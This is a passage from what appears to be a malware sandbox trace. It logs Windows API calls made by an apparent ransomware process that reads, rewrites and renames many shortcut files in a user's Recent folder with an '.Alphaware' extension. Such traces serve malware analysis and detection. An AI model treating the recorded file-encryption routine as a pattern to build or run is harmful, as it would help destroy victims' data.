lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4iWuq2Z09OQUcI.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4iwuq2z09oquci.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2515138 | out: lpFileInformation=0x2515138*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd15e5fa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15e5fa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15e5fa0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1371)) returned 1 [0094.972] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4iWuq2Z09OQUcI.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4iwuq2z09oquci.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.972] ReadFile (in: hFile=0x250, lpBuffer=0x2515430, nNumberOfBytesToRead=0x1371, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2515430*, lpNumberOfBytesRead=0x23e958*=0x1371, lpOverlapped=0x0) returned 1 [0094.995] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4iWuq2Z09OQUcI.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4iwuq2z09oquci.flv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.997] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4iWuq2Z09OQUcI.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4iwuq2z09oquci.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15e5fa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15e5fa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ad255a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1ac8)) returned 1 [0094.997] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4iWuq2Z09OQUcI.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4iwuq2z09oquci.flv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4iWuq2Z09OQUcI.flv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4iwuq2z09oquci.flv.lnk.alphaware")) returned 1 [0094.998] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4_p930HVcZ_.lnk", dwFileAttributes=0x80) returned 1 [0094.999] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4_p930HVcZ_.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4_p930hvcz_.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25a0ec8 | out: lpFileInformation=0x25a0ec8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf3ae360, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15e5fa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15e5fa0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdc0)) returned 1 [0094.999] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4_p930HVcZ_.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4_p930hvcz_.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.999] ReadFile (in: hFile=0x250, lpBuffer=0x25a1f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25a1f58*, lpNumberOfBytesRead=0x23e958*=0xdc0, lpOverlapped=0x0) returned 1 [0095.027] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4_p930HVcZ_.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4_p930hvcz_.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.030] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4_p930HVcZ_.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4_p930hvcz_.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf3ae360, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15e5fa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ad71860, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1334)) returned 1 [0095.030] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4_p930HVcZ_.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4_p930hvcz_.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4_p930HVcZ_.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4_p930hvcz_.lnk.alphaware")) returned 1 [0095.031] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\584vk2Slwl33KAWC.lnk", dwFileAttributes=0x80) returned 1 [0095.031] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\584vk2Slwl33KAWC.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\584vk2slwl33kawc.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24295c8 | out: lpFileInformation=0x24295c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0db7400, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0db7400, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0db7400, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe39)) returned 1 [0095.032] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\584vk2Slwl33KAWC.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\584vk2slwl33kawc.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.032] ReadFile (in: hFile=0x250, lpBuffer=0x242a718, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x242a718*, lpNumberOfBytesRead=0x23e958*=0xe39, lpOverlapped=0x0) returned 1 [0095.053] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\584vk2Slwl33KAWC.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\584vk2slwl33kawc.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.079] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\584vk2Slwl33KAWC.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\584vk2slwl33kawc.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0db7400, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0db7400, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ade3c80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13c8)) returned 1 [0095.079] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\584vk2Slwl33KAWC.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\584vk2slwl33kawc.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\584vk2Slwl33KAWC.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\584vk2slwl33kawc.lnk.alphaware")) returned 1 [0095.082] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5jdQ8S.lnk", dwFileAttributes=0x80) returned 1 [0095.082] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5jdQ8S.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5jdq8s.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24b2e88 | out: lpFileInformation=0x24b2e88*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcef37a20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1501760, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1501760, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x8d0)) returned 1 [0095.082] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5jdQ8S.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5jdq8s.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.083] ReadFile (in: hFile=0x250, lpBuffer=0x24b3a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b3a08*, lpNumberOfBytesRead=0x23e958*=0x8d0, lpOverlapped=0x0) returned 1 [0095.108] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5jdQ8S.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5jdq8s.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5jdQ8S.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5jdq8s.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcef37a20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1501760, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ae2ff40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xca0)) returned 1 [0095.114] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5jdQ8S.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5jdq8s.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5jdQ8S.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5jdq8s.lnk.alphaware")) returned 1 [0095.115] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5K5LME1qn8ON6owMG2.lnk", dwFileAttributes=0x80) returned 1 [0095.118] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5K5LME1qn8ON6owMG2.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5k5lme1qn8on6owmg2.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25382d0 | out: lpFileInformation=0x25382d0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0bee380, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0bee380, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0bee380, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xf25)) returned 1 [0095.118] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5K5LME1qn8ON6owMG2.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5k5lme1qn8on6owmg2.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.118] ReadFile (in: hFile=0x250, lpBuffer=0x2539508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2539508*, lpNumberOfBytesRead=0x23e958*=0xf25, lpOverlapped=0x0) returned 1 [0095.139] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5K5LME1qn8ON6owMG2.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5k5lme1qn8on6owmg2.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.142] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5K5LME1qn8ON6owMG2.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5k5lme1qn8on6owmg2.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0bee380, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0bee380, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ae7c200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1508)) returned 1 [0095.142] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5K5LME1qn8ON6owMG2.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5k5lme1qn8on6owmg2.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5K5LME1qn8ON6owMG2.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5k5lme1qn8on6owmg2.lnk.alphaware")) returned 1 [0095.143] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5Oehl_lcMAlFB_Z.lnk", dwFileAttributes=0x80) returned 1 [0095.144] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5Oehl_lcMAlFB_Z.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5oehl_lcmalfb_z.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25c1f88 | out: lpFileInformation=0x25c1f88*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0fcc740, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0fcc740, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0ff28a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1846)) returned 1 [0095.144] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5Oehl_lcMAlFB_Z.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5oehl_lcmalfb_z.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.144] ReadFile (in: hFile=0x250, lpBuffer=0x25c2260, nNumberOfBytesToRead=0x1846, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25c2260*, lpNumberOfBytesRead=0x23e958*=0x1846, lpOverlapped=0x0) returned 1 [0095.172] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5Oehl_lcMAlFB_Z.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5oehl_lcmalfb_z.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.175] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5Oehl_lcMAlFB_Z.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5oehl_lcmalfb_z.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0fcc740, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0fcc740, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8aec84c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2134)) returned 1 [0095.175] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5Oehl_lcMAlFB_Z.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5oehl_lcmalfb_z.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5Oehl_lcMAlFB_Z.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\5oehl_lcmalfb_z.lnk.alphaware")) returned 1 [0095.176] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6jCAQWe-_9EEl7aEUjN.lnk", dwFileAttributes=0x80) returned 1 [0095.177] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6jCAQWe-_9EEl7aEUjN.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\6jcaqwe-_9eel7aeujn.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2451e08 | out: lpFileInformation=0x2451e08*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1716aa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1716aa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd173cc00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x39d)) returned 1 [0095.177] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6jCAQWe-_9EEl7aEUjN.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\6jcaqwe-_9eel7aeujn.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.177] ReadFile (in: hFile=0x250, lpBuffer=0x24524a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24524a0*, lpNumberOfBytesRead=0x23e958*=0x39d, lpOverlapped=0x0) returned 1 [0095.293] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6jCAQWe-_9EEl7aEUjN.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\6jcaqwe-_9eel7aeujn.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.296] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6jCAQWe-_9EEl7aEUjN.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\6jcaqwe-_9eel7aeujn.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1716aa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1716aa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8aff8fc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5a0)) returned 1 [0095.296] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6jCAQWe-_9EEl7aEUjN.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\6jcaqwe-_9eel7aeujn.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6jCAQWe-_9EEl7aEUjN.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\6jcaqwe-_9eel7aeujn.lnk.alphaware")) returned 1 [0095.298] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7Cu9qgyf.lnk", dwFileAttributes=0x80) returned 1 [0095.298] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7Cu9qgyf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7cu9qgyf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24d3e38 | out: lpFileInformation=0x24d3e38*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd127a000, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd127a000, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd127a000, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x133b)) returned 1 [0095.299] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7Cu9qgyf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7cu9qgyf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.299] ReadFile (in: hFile=0x250, lpBuffer=0x24d40d8, nNumberOfBytesToRead=0x133b, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24d40d8*, lpNumberOfBytesRead=0x23e958*=0x133b, lpOverlapped=0x0) returned 1 [0095.409] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7Cu9qgyf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7cu9qgyf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.413] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7Cu9qgyf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7cu9qgyf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd127a000, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd127a000, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b129ac0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a74)) returned 1 [0095.413] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7Cu9qgyf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7cu9qgyf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7Cu9qgyf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7cu9qgyf.lnk.alphaware")) returned 1 [0095.414] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7ord0oMkDdqdZwcFM7PM.mkv.lnk", dwFileAttributes=0x80) returned 1 [0095.415] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7ord0oMkDdqdZwcFM7PM.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7ord0omkddqdzwcfm7pm.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x255f860 | out: 